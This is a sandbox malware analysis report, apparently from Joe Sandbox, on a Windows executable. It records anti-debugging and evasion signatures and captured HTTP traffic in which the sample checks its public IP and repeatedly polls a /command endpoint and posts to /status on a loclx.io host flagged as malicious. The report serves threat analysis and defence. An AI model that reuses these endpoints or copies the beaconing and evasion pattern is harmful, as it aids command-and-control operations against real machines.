Edit tour

Windows Analysis Report
jgbC220X2U.exe

Overview

General Information

Sample name:	jgbC220X2U.exe renamed because original name is a hash value
Original sample name:	f88fa3aa1dc3a59d1914254917c835783d84d384675f3622dde5aa7893952c96.exe
Analysis ID:	1573000
MD5:	28354f3e0d66d054bf0d05c3caf1e28a
SHA1:	612fa801d24607511387c8e051bd6de9e0d26b9e
SHA256:	f88fa3aa1dc3a59d1914254917c835783d84d384675f3622dde5aa7893952c96
Tags:	exeloclx-iouser-JAMESWT_MHT
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Classification

Process Tree

System is w10x64

jgbC220X2U.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\jgbC220X2U.exe" MD5: 28354F3E0D66D054BF0D05C3CAF1E28A)

conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pepwuecibr.eu.loclx.io/command	Avira URL Cloud: Label: phishing
Source: http://pepwuecibr.eu.loclx.io	Avira URL Cloud: Label: phishing
Source: http://pepwuecibr.eu.loclx.io/status	Avira URL Cloud: Label: phishing

Source: jgbC220X2U.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rdi	0_2_00007FF72A03AB9D
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06AA50
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF72A0C6B00
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rsi	0_2_00007FF72A042348
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rsi	0_2_00007FF72A04234D
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06A4D0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	0_2_00007FF72A02A510
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rbp	0_2_00007FF729FDE2A0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r15	0_2_00007FF729FDA8B0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r14	0_2_00007FF72A0166C0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then sub rsp, 38h	0_2_00007FF72A077BB0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then sub rsp, 38h	0_2_00007FF72A0739B0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06BF80
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06FF10
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06B3B0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06F150
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06B1F0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rcx]	0_2_00007FF729FD37E0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rsi	0_2_00007FF72A077640
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	0_2_00007FF72A028FF0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rsi	0_2_00007FF72A07CEC0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then jmp 00007FF72A041000h	0_2_00007FF72A044348
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then jmp 00007FF72A041000h	0_2_00007FF72A04434D
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+10h]	0_2_00007FF72A08C410
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rcx, rsi	0_2_00007FF72A06844A
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rcx, rsi	0_2_00007FF72A068457
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rcx, rsi	0_2_00007FF72A0681F0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rdi	0_2_00007FF72A0688B0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06DB20
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then jmp 00007FF72A01E8D0h	0_2_00007FF72A021CE8
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then jmp 00007FF72A01E8D0h	0_2_00007FF72A021CED
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+10h]	0_2_00007FF72A08D970
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rdi	0_2_00007FF72A04602A
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r13	0_2_00007FF72A079E60
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r13	0_2_00007FF72A079E60
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r13	0_2_00007FF72A0793C0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r13	0_2_00007FF72A0793C0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rsi	0_2_00007FF72A07D4E0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push rdi	0_2_00007FF72A03D12D
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	0_2_00007FF72A0AD1A0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rax, qword ptr [rbp+38h]	0_2_00007FF72A06D220
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r12	0_2_00007FF72A0512B6
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r12	0_2_00007FF72A0512B1
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then push r15	0_2_00007FF72A00D520
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 4x nop then mov rcx, rsi	0_2_00007FF72A0681F0

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\jgbC220X2U.exe

Code function: 0_2_00007FF72A0BFA30 recv,recv,

0_2_00007FF72A0BFA30

Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close
Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: api.ipify.orgConnection: close
Source: global traffic	HTTP traffic detected: GET /command HTTP/1.1User-Agent: cpp-httplib/0.18.0Accept: /Host: pepwuecibr.eu.loclx.ioConnection: close

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: pepwuecibr.eu.loclx.io

Source: unknown

HTTP traffic detected: POST /status HTTP/1.1Content-Length: 39User-Agent: cpp-httplib/0.18.0Accept: */*Host: pepwuecibr.eu.loclx.ioConnection: closeContent-Type: application/json

Source: jgbC220X2U.exe	String found in binary or memory: http://api.ipify.org
Source: jgbC220X2U.exe	String found in binary or memory: http://api.ipify.org/?format=textUnknown
Source: jgbC220X2U.exe	String found in binary or memory: http://pepwuecibr.eu.loclx.io
Source: jgbC220X2U.exe, 00000000.00000002.3289657421.00000248F1DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.
Source: jgbC220X2U.exe, 00000000.00000002.3289536896.00000089B8FF9000.00000004.00000010.00020000.00000000.sdmp, jgbC220X2U.exe, 00000000.00000002.3289657421.00000248F1DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Nunito:700

Source: C:\Users\user\Desktop\jgbC220X2U.exe

Code function: 0_2_00007FF729FB2050 ntohs,ntohs,getnameinfo,

0_2_00007FF729FB2050

Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FA5450	0_2_00007FF729FA5450
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FCECA0	0_2_00007FF729FCECA0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF6CFE	0_2_00007FF729FF6CFE
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF2AB0	0_2_00007FF729FF2AB0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729F8AFA0	0_2_00007FF729F8AFA0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FE30B0	0_2_00007FF729FE30B0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF72A0A6EA0	0_2_00007FF72A0A6EA0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729F8EF16	0_2_00007FF729F8EF16
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FCE380	0_2_00007FF729FCE380
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF2150	0_2_00007FF729FF2150
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FDE2A0	0_2_00007FF729FDE2A0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FD6300	0_2_00007FF729FD6300
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FEE815	0_2_00007FF729FEE815
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FDA8B0	0_2_00007FF729FDA8B0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FFE900	0_2_00007FF729FFE900
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FFA711	0_2_00007FF729FFA711
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF7B7E	0_2_00007FF729FF7B7E
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FFBFB0	0_2_00007FF729FFBFB0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729F93FFA	0_2_00007FF729F93FFA
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FEBD53	0_2_00007FF729FEBD53
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF3DD0	0_2_00007FF729FF3DD0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FFF340	0_2_00007FF729FFF340
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF3480	0_2_00007FF729FF3480
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FD7510	0_2_00007FF729FD7510
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FE3270	0_2_00007FF729FE3270
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FFB590	0_2_00007FF729FFB590
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FEF6CA	0_2_00007FF729FEF6CA
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF72A068B30	0_2_00007FF72A068B30
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FECB93	0_2_00007FF729FECB93
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF89DE	0_2_00007FF729FF89DE
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FFC9F0	0_2_00007FF729FFC9F0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF0EB0	0_2_00007FF729FF0EB0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF72A0103E0	0_2_00007FF72A0103E0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FD84C0	0_2_00007FF729FD84C0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FDC250	0_2_00007FF729FDC250
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729F848C0	0_2_00007FF729F848C0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF0520	0_2_00007FF729FF0520
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FA4690	0_2_00007FF729FA4690
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FED9B3	0_2_00007FF729FED9B3
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FE1FE0	0_2_00007FF729FE1FE0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF72A012080	0_2_00007FF72A012080
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FCDE10	0_2_00007FF729FCDE10
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FE1E20	0_2_00007FF729FE1E20
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FFDE60	0_2_00007FF729FFDE60
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF5EB0	0_2_00007FF729FF5EB0
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729F85360	0_2_00007FF729F85360
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FFD410	0_2_00007FF729FFD410
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FDD290	0_2_00007FF729FDD290
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF729FF1800	0_2_00007FF729FF1800
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: 0_2_00007FF72A00D520	0_2_00007FF72A00D520

Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A075680 appears 138 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0B3870 appears 41 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0B4720 appears 158 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A076010 appears 126 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0C4650 appears 75 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0C44B0 appears 50 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0C4780 appears 166 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0C65D0 appears 103 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0577D0 appears 182 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0C66C0 appears 103 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A0C4B10 appears 43 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A071D40 appears 50 times
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Code function: String function: 00007FF72A069B50 appears 129 times

Source: jgbC220X2U.exe

Static PE information: Number of sections : 20 > 10

Source: classification engine

Classification label: mal48.winEXE@2/1@4/3

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03

Source: jgbC220X2U.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\jgbC220X2U.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jgbC220X2U.exe "C:\Users\user\Desktop\jgbC220X2U.exe"
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\jgbC220X2U.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jgbC220X2U.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: jgbC220X2U.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: jgbC220X2U.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: jgbC220X2U.exe

Static file information: File size 7131898 > 1048576

Source: jgbC220X2U.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x146800

Source: jgbC220X2U.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\jgbC220X2U.exe

Code function: 0_2_00007FF729F815E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF729F815E0

Source: jgbC220X2U.exe	Static PE information: section name: /4
Source: jgbC220X2U.exe	Static PE information: section name: .xdata
Source: jgbC220X2U.exe	Static PE information: section name: /14
Source: jgbC220X2U.exe	Static PE information: section name: /29
Source: jgbC220X2U.exe	Static PE information: section name: /41
Source: jgbC220X2U.exe	Static PE information: section name: /55
Source: jgbC220X2U.exe	Static PE information: section name: /67
Source: jgbC220X2U.exe	Static PE information: section name: /80
Source: jgbC220X2U.exe	Static PE information: section name: /91
Source: jgbC220X2U.exe	Static PE information: section name: /107
Source: jgbC220X2U.exe	Static PE information: section name: /123

Source: C:\Users\user\Desktop\jgbC220X2U.exe

API coverage: 2.2 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: jgbC220X2U.exe, 00000000.00000002.3289657421.00000248F1DE8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\jgbC220X2U.exe

Code function: 0_2_00007FF729F9AB32 IsDebuggerPresent,RaiseException,

0_2_00007FF729F9AB32

Source: C:\Users\user\Desktop\jgbC220X2U.exe

Code function: 0_2_00007FF729F815E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF729F815E0

Source: C:\Users\user\Desktop\jgbC220X2U.exe

Code function: 0_2_00007FF729F81154 Sleep,_initterm,_initterm,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,exit,_cexit,

0_2_00007FF729F81154

Source: C:\Users\user\Desktop\jgbC220X2U.exe

Code function: 0_2_00007FF729F9EAC0 _errno,GetSystemTimeAsFileTime,GetSystemTimeAsFileTime,_errno,

0_2_00007FF729F9EAC0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Process Injection	1 Process Injection	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 System Information Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
jgbC220X2U.exe	5%	ReversingLabs

Source	Detection	Scanner	Label
http://pepwuecibr.eu.loclx.io/command	100%	Avira URL Cloud	phishing
http://pepwuecibr.eu.loclx.io	100%	Avira URL Cloud	phishing
http://pepwuecibr.eu.loclx.io/status	100%	Avira URL Cloud	phishing
https://fonts.googleapis.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
eu.loclx.io	167.99.38.229	true	false	unknown
api.ipify.org	172.67.74.152	true	false	high
pepwuecibr.eu.loclx.io	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://pepwuecibr.eu.loclx.io/status	false	Avira URL Cloud: phishing	unknown
http://pepwuecibr.eu.loclx.io/command	false	Avira URL Cloud: phishing	unknown
http://api.ipify.org/?format=text	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://fonts.googleapis.	jgbC220X2U.exe, 00000000.00000002.3289657421.00000248F1DE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pepwuecibr.eu.loclx.io	jgbC220X2U.exe	false	Avira URL Cloud: phishing	unknown
http://api.ipify.org/?format=textUnknown	jgbC220X2U.exe	false		high
http://api.ipify.org	jgbC220X2U.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
167.99.38.229	eu.loclx.io	United States	14061	DIGITALOCEAN-ASNUS	false
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573000
Start date and time:	2024-12-11 11:28:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	jgbC220X2U.exe renamed because original name is a hash value
Original Sample Name:	f88fa3aa1dc3a59d1914254917c835783d84d384675f3622dde5aa7893952c96.exe
Detection:	MAL
Classification:	mal48.winEXE@2/1@4/3
EGA Information:	Successful, ratio: 100%
